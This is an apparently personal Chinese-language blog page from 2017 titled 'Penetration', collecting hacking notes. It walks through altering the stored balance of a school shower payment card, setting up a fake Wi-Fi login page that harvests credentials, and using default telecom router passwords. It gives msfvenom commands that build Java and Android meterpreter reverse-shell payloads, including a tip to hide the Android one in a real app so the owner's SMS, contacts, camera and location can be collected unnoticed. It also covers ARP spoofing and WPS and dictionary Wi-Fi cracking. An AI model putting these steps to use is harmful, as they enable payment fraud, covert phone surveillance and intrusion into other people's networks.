<!DOCTYPE html>
<html>
<head>
    <title>Penetration // Peculiar</title>

        <meta charset="utf-8">
    <meta http-equiv="content-type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">
    <meta name="description" content="">
    <meta name="keywords" content="">
    <meta name="author" content="">
        <meta property="og:title" content="Penetration" />
    <meta property="og:description" content="" />
    <meta property="og:type" content="website" />
    <meta property="og:locale" content="en_US" />
    <meta property="og:url" content="https://biexiang.github.io/post/penetration/" />
    

    <link href="" rel="alternate" type="application/rss+xml" title="Peculiar" />
    <link rel="shortcut icon" href="/favicon.png">

    <link href="https://biexiang.github.io/webfonts/ptserif/main.css" rel='stylesheet' type='text/css'>
    <link href="https://biexiang.github.io/webfonts/source-code-pro/main.css" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="https://biexiang.github.io/css/style.css">

    <link href="http://gmpg.org/xfn/11" rel="profile">
    
    <meta name="generator" content="Hugo 0.24.1" />
</head>


<body>
<div id="container">
    <header id="header">
    <div id="header-outer" class="outer">
        <div id="header-inner" class="inner">
            <a id="main-nav-toggle" class="nav-icon" href="javascript:;"></a>
            <a id="logo" class="logo-text" href="https://biexiang.github.io/">Peculiar</a>
            <nav id="main-nav">
                
                <a class="main-nav-link" href="/archives">Archives</a>
                
                <a class="main-nav-link" href="/about">About</a>
                
            </nav>
            <nav id="sub-nav">
                <div id="search-form-wrap">
                </div>
            </nav>
        </div>
    </div>
</header>
    <section id="main" class="outer">
        <article class="article article-type-post" itemscope itemprop="blogPost">
    <div class="article-inner">
        
        <header class="article-header">
            <h1 class="article-title" itemprop="name">Penetration</h1>
        </header>
        
        <div class="article-meta">
            <a href="/post/penetration/" class="article-date">
                <time datetime='2017-10-06T17:09:53.000&#43;08:00' itemprop="datePublished">2017-10-06</time>
            </a>
            
            
            
        </div>
        <div class="article-entry" itemprop="articleBody">
            <p>安全渗透记录，好玩的渗透记录。</p>

<p></p>

<h2 id="刷洗澡卡">刷洗澡卡</h2>

<p>使用PN532对学校的洗澡卡进行写和读，学校的洗澡卡数据部分放在了3和4扇区。</p>

<ul>
<li>mfoc -o 对卡进行破解，如果找到了key A或者key B，可以读取整个卡的数据，dump成16进制文件，这个文件中的3扇区有价格的内容，16进制数字需要倒过来进行存放，行尾还有一个校验位，卡的最高改动额度为650左右。</li>
<li>在将改过的数据写入白卡中即可。</li>
</ul>

<h2 id="fake-ap-and-login-page">Fake AP and Login Page</h2>

<p><a href="https://github.com/markszabo/Hacktivity2016">https://github.com/markszabo/Hacktivity2016</a><br />
Esp8266处理速度太慢，如果想记录输入的内容，可以写一个公网脚本来接收数据，表单数据Post到这个公网的地址。</p>

<h2 id="电信天翼家庭宽带密码">电信天翼家庭宽带密码</h2>

<p>用户名：telecomadmin<br />
密码：nE7jA%5m</p>

<p>移动cmadmin（不确定），联通unicomadmin，电信telecomadmin。密码最多是nE7j%5m。</p>

<h2 id="ms17-010-http-sec000-com-ms17-010">MS17-010 <a href="http://sec000.com/ms17-010/">http://sec000.com/ms17-010/</a></h2>

<p><a href="http://www.4hou.com/technology/4577.html">http://www.4hou.com/technology/4577.html</a></p>

<pre><code>    export WINEPREFIX=/home/username/.wine  
</code></pre>

<h2 id="metasploit渗透">Metasploit渗透</h2>

<h4 id="metasploit渗透by-java">Metasploit渗透By java</h4>

<pre><code>    #生成payload  
    msfvenom --payload=&quot;java/meterpreter/reverse_tcp&quot; LHOST=192.168.50.167 LPORT=4444 -t jar &gt; fujie.jar  

    #监控  
    msfconsole   
    use exploit/multi/handler   
    set payload java/meterpreter/reverse_tcp   
    set LHOST 192.168.1.107   
    set LPORT 4444   
    exploit -j -z  
</code></pre>

<h2 id="局域网踢人">局域网踢人</h2>

<h4 id="kickthemout-py">kickthemout.py</h4>

<p>原理：ARP Spoof attack</p>

<p>就算没有路由器的管理权限，也可以通过这种方式对某一个设备进行断网处理，实测有时候数据包还是能够发送出去，但是大多数时候还是被限制了。脚本会扫描到网卡的描述，而获取到设备的信息。对指定的ip进行踢出。</p>

<h2 id="渗透android手机">渗透Android手机</h2>

<h4 id="metasploit">Metasploit</h4>

<p>以前总觉得Metaspoit很高大上，确实也是很厉害的工具，自己以前装Kali没兴趣弄，现在用OSX，又来了点兴趣。</p>

<p>其实步骤很简单，Mac<a href="https://osx.metasploit.com/">下载pkg</a>就可以安装。安装后文件在目录下：</p>

<pre><code>    /opt/metasploit-framework/  
</code></pre>

<div markdown="1" style="-en-paragraph: true; margin-top: 1em; margin-bottom: 1em;">

首先生成一个Android的Payload文件：</div>
    

<pre><code>    #lhost是服务端的IP地址 rhost是Payload的地址 同理lport    
    msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.102 LPORT=443 &gt; ~/Desktop/Hack/Poly.apk  
</code></pre>

<div markdown="1" style="-en-paragraph: true; margin-top: 1em; margin-bottom: 1em;">

安装apk程序后，实际是一个简单的MainFrameWork，一般都应该是嵌到有实际功能的apk中。申请了权限户可以进行数据收集，不易被察觉。 </div>

<div markdown="1" style="-en-paragraph: true; margin-top: 1em; margin-bottom: 1em;">

Payload的安装后，可以开启msfconsole进行渗透。 </div>
    

<pre><code>    #在/opt/metasploit-framework/bin目录下 sudo ./msfconsole 因为1024以内的端口都需要root权限  
    use exploit/multi/handler  
    set PAYLOAD android/meterpreter/reverse_tcp  
    set LHOST 192.168.2.102  
    set LPORT 443  
    exploit   

    #使用sessions -i 1选择会话进入  
</code></pre>

<p>进入Android的session后，可以sysinfo查看系统信息，进入文件系统查看下载，dump短信、通信录、最近消息。</p>

<p>还可以截图，web_stream，只要给了权限，应用可以监视你的任何操作。</p>

<p>摄像头，屏幕，地理位置，联系人都可以获取到。</p>

<p>这只是Metasploit的一小部分，它还可以正向突破，还可以获取Windows、Linux的提权，有待发现！</p>

<h2 id="路由器破解">路由器破解</h2>

<h4 id="跑pin">跑pin</h4>

<div markdown="1" style="-en-paragraph: true; margin-top: 1em; margin-bottom: 1em;">

需要路由器开启wps,使用wps生成的pin码，8位，可以直接登录路由器，前4位验证不合，会直接返回错误，所以前四位跑破解10K，后四位中，最后一位是校验位，所以后四位一共跑1k，总的计算次数只需要最多11k次。就能够破解</div>

<h4 id="跑字典">跑字典</h4>

<p>如果没有开启wps，可以通过抓包，对抓到的验证信息进行跑密码字典破解。</p>

<p>在Mac上步骤</p>

<pre><code>    #查看ssid对应的channel和信号强度 选取信号强的ch进行sniff  
    sudo airport -s   
    #sniff 选择的ch  
    sudo airport en0 sniff [CH]  

    ##结果会保存到/tmp/目录下 是一个cap文件 保存了监测到的数据包  

    #选择1 handshake的ssid进行破解跑字典  
    sudo aircrack-ng -w /path/to/字典 /path/to/数据包.cap  
</code></pre>

<p>尝试了要几次，可能没有人使用网络，获取到的cap没有1 handshake的数据包。但是原理基本就是这样。</p>

<p>就算获取到了可以跑字典的数据包，如果密码强度高，自己的字典中没有，也是没戏，又或者字典很大，需要跑很久的字典。淘宝上有专门的服务可以帮忙跑字典获取pass。</p>

<p>所以，如果不是特别的evil，这个还是没有很大的用处，只是听起来比较Geek，问别人一声，wifi 密码是多少也挺好的。</p>
        </div>

        
        
        <div class="article-toc" style="display:none;">
            <h3>Contents</h3>
            <nav id="TableOfContents">
<ul>
<li>
<ul>
<li><a href="#刷洗澡卡">刷洗澡卡</a></li>
<li><a href="#fake-ap-and-login-page">Fake AP and Login Page</a></li>
<li><a href="#电信天翼家庭宽带密码">电信天翼家庭宽带密码</a></li>
<li><a href="#ms17-010-http-sec000-com-ms17-010">MS17-010 <a href="http://sec000.com/ms17-010/">http://sec000.com/ms17-010/</a></a></li>
<li><a href="#metasploit渗透">Metasploit渗透</a>
<ul>
<li>
<ul>
<li><a href="#metasploit渗透by-java">Metasploit渗透By java</a></li>
</ul></li>
</ul></li>
<li><a href="#局域网踢人">局域网踢人</a>
<ul>
<li>
<ul>
<li><a href="#kickthemout-py">kickthemout.py</a></li>
</ul></li>
</ul></li>
<li><a href="#渗透android手机">渗透Android手机</a>
<ul>
<li>
<ul>
<li><a href="#metasploit">Metasploit</a></li>
</ul></li>
</ul></li>
<li><a href="#路由器破解">路由器破解</a>
<ul>
<li>
<ul>
<li><a href="#跑pin">跑pin</a></li>
<li><a href="#跑字典">跑字典</a></li>
</ul></li>
</ul></li>
</ul></li>
</ul>
</nav>
        </div>
        
        

        
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.1/jquery.slim.min.js" integrity="sha256-/SIrNqv8h6QGKDuNoLGA4iret+kyesCkHGzVUUV0shc=" crossorigin="anonymous"></script>
        <script>
            (function() {
                var $toc = $('#TableOfContents');
                if ($toc.length > 0) {
                    var $window = $(window);

                    function onScroll(){
                        var currentScroll = $window.scrollTop();
                        var h = $('.article-entry h1, .article-entry h2, .article-entry h3, .article-entry h4, .article-entry h5, .article-entry h6');
                        var id = "";
                        h.each(function (i, e) {
                            e = $(e);
                            if (e.offset().top - 10 <= currentScroll) {
                                id = e.attr('id');
                            }
                        });
                        var active = $toc.find('a.active');
                        if (active.length == 1 && active.eq(0).attr('href') == '#' + id) return true;

                        active.each(function (i, e) {
                            $(e).removeClass('active').siblings('ul').hide();
                        });
                        $toc.find('a[href="#' + id + '"]').parentsUntil('#TableOfContents').each(function (i, e) {
                            $(e).children('a').addClass('active').siblings('ul').show();
                        });
                    }

                    $window.on('scroll', onScroll);
                    $(document).ready(function() {
                        $toc.find('a').parent('li').find('ul').hide();
                        onScroll();
                        document.getElementsByClassName('article-toc')[0].style.display = '';
                    });
                }
            })();
        </script>
        


        
        <footer class="article-footer">
            <ul class="article-tag-list">
                
                <li class="article-tag-list-item">
                    <a class="article-tag-list-link" href="https://biexiang.github.io//tags/hack">Hack
                    </a>
                </li>
                
            </ul>
        </footer>
        
    </div>
    <nav id="article-nav">
    
    <a href="/post/cli-over-the-wall/" id="article-nav-newer" class="article-nav-link-wrap">
        <div class="article-nav-title"><span>&lt;</span>&nbsp;
            Mac命令行Socks5代理翻墙
        </div>
    </a>
    
    
    <a href="/post/awk/" id="article-nav-older" class="article-nav-link-wrap">
        <div class="article-nav-title">Awk记录&nbsp;<span>&gt;</span></div>
    </a>
    
</nav>
</article>

        
    </section>
    <footer id="footer">
    <div class="outer">
        <div id="footer-info" class="inner">
            &copy; 2018 map[name:Poly email:noreply#qq.com]&nbsp;
            Powered by <a href="https://gohugo.io" target="_blank">Hugo</a> with theme <a href="https://github.com/carsonip/hugo-theme-minos">Minos</a>
        </div>
    </div>
    

    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/styles/tomorrow-night.min.css" integrity="sha256-2wL88NKUqvJi/ExflDzkzUumjUM73mcK2gBvBBeLvTk=" crossorigin="anonymous" />
    <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/highlight.min.js" integrity="sha256-KbfTjB0WZ8vvXngdpJGY3Yp3xKk+tttbqClO11anCIU=" crossorigin="anonymous"></script>
    <script>hljs.initHighlightingOnLoad();</script>

    
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.7.1/katex.min.css" integrity="sha384-wITovz90syo1dJWVh32uuETPVEtGigN07tkttEqPv+uR2SE/mbQcG7ATL28aI9H0" crossorigin="anonymous">
        <script src="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.7.1/katex.min.js" integrity="sha384-/y1Nn9+QQAipbNQWU65krzJralCnuOasHncUFXGkdwntGeSvQicrYkiUBwsgUqc1" crossorigin="anonymous"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.7.1/contrib/auto-render.min.js" integrity="sha256-ExtbCSBuYA7kq1Pz362ibde9nnsHYPt6JxuxYeZbU+c=" crossorigin="anonymous"></script>
        <script>renderMathInElement(document.body);</script>
    
    <script>
        document.getElementById('main-nav-toggle').addEventListener('click', function () {
            var header = document.getElementById('header');
            if (header.classList.contains('mobile-on')) {
                header.classList.remove('mobile-on');
            } else {
                header.classList.add('mobile-on');
            }
        });
    </script>
</footer>
</div>
</body>
</html>
